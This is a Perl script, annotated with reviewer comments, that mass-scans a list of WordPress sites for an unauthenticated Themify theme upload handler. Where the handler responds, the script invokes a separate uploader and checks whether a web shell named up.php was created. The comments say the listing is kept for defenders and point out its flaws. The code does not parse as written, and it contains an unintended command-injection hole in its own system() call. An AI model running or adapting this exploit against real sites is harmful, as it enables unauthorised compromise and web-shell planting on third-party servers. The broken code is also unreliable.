#!/usr/bin/perl
# Coded by "Paradox"
# Recoded By "Zeuxhaxor"

use LWP::Simple;
use HTTP::Request::Common;
use Term::ANSIColor;
# WordPress "Auto Upload" mass-exploitation script targeting a Themify theme
# upload handler. Documented here for defenders and code reviewers only; the
# code itself is left byte-identical.
#
# Flow: the operator types the name of a file of hostnames; for each host the
# front page is fetched, a theme slug is scraped from a
# /wp-content/themes/<slug>/style*.css reference, then
# <slug>/themify/themify-ajax.php?upload=1 is probed. On any 2xx the script
# shells out to "php upload.php <url>" (upload.php is a separate file, not in
# this listing) and then probes <slug>/uploads/up.php to decide whether a web
# shell was written.
#
# NOTE(review): there is no `use strict; use warnings;` — every variable below
# is a package global, and $themex is never reset between hosts (see below).
$ua = LWP::UserAgent->new;   # not referenced anywhere else in this listing; $tbk below is the client actually used

print color("blue"),"[+] WordPress Auto Upload "zeuxhaxor@yahoo.com" [+]\n\n ";
# ^ the double quotes around the e-mail address are unbalanced, so this
#   statement does not parse as written.
print color 'reset';
print "Masukan List Target: ";   # Indonesian: "Enter target list:" — expects a filename
$file = ;
# ^ the readline operator (angle brackets) appears to have been stripped by
#   HTML extraction here and on the `my @file = ;` line below; as written the
#   script is not valid Perl.
chomp($file);
open (file, "<$file") || die "[-] Can't open the List of site file !"; my @file = ;
# ^ 2-arg open on a bareword filehandle with an unvalidated, operator-supplied
#   path: mode characters inside $file are honoured by open().
close file;
foreach $webs (@file)
{
chomp($webs);
$site = $webs;
# Strip any scheme prefix; every probe URL below is rebuilt as plain http://.
$site =~ s/http:\/\///;
$site =~ s/https:\/\///;

print color("blue"), "\n[+] Scanning http://$site";
$tbk = LWP::UserAgent->new() or die "Could not initialize browser\n";
# Static spoofed Firefox 3.0 User-Agent — a fixed string, and therefore an
# easy web-server-log indicator for defenders.
$tbk->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)');
$tembaka = "http://$site/index.php";
$_door = $tbk->request(HTTP::Request->new(GET=>$tembaka));
$tbkk = $_door->content;
# Theme-slug scraping. Both captures use a greedy `(.*)` (no /s, so bounded by
# the line), meaning $1 can run past the slug to a later style reference on
# the same line and may contain slashes. When both patterns match, the second
# assignment wins. $themex is never reset per host, so a host with no match
# silently reuses the previous host's slug.
if ($tbkk =~ m/\/wp-content\/themes\/(.*)\/style.min.css/){
$themex = $1;
print color 'reset';
}
if ($tbkk =~ m/\/wp-content\/themes\/(.*)\/style.css/){
$themex = $1;
print color 'reset';
}
my $param = $themex;
if (defined $param) {
print color("white"), "\n[+] Themes Found => $param ";
$targetku = "$site/wp-content/themes/$themex/themify/themify-ajax.php?upload=1";
$targetku =~ s/\/\//\//;   # collapses only the FIRST "//" (no /g modifier)
$tembaka = "http://$targetku";
$_woot = $tbk->request(HTTP::Request->new(GET=>$tembaka));
# Any 2xx response is treated as "vulnerable": a soft-404 site (200 for
# unknown paths) is a false positive and still triggers the upload step.
if ($_woot->is_success){
print color("bold green"),"\n[?] Vuln -> http://$site";
print "\n[?] Exploit.......";
# SECURITY(review): $targetku embeds $themex, scraped unescaped from the
# target's HTML, and is handed to the shell via one-argument system(). A
# target or honeypot that serves a crafted theme path (shell metacharacters
# in the slug) can therefore run commands on the machine executing this
# script.
system "php upload.php $targetku";
$tembaka = "http://$site/wp-content/themes/$themex/uploads/up.php";
$_door = $tbk->request(HTTP::Request->new(GET=>$tembaka));
# Same 2xx-only check; the response body is never inspected, so "Shell
# Created" is inferred, not confirmed.
if ($_door->is_success){
print color("bold white"),"\n [+] Shell Created ";
print "\n [+] Shell : $tembaka ";
}
else {
print "\n [+] Exploit Gagal bro ";   # Indonesian: "Exploit failed"
}
}else{
print color("bold red"),"\n[?] Not Vuln -> http://$site";
}
}else{
print color("bold red"), "\n[+] Themes not found -_-";
}
print color 'reset';
}
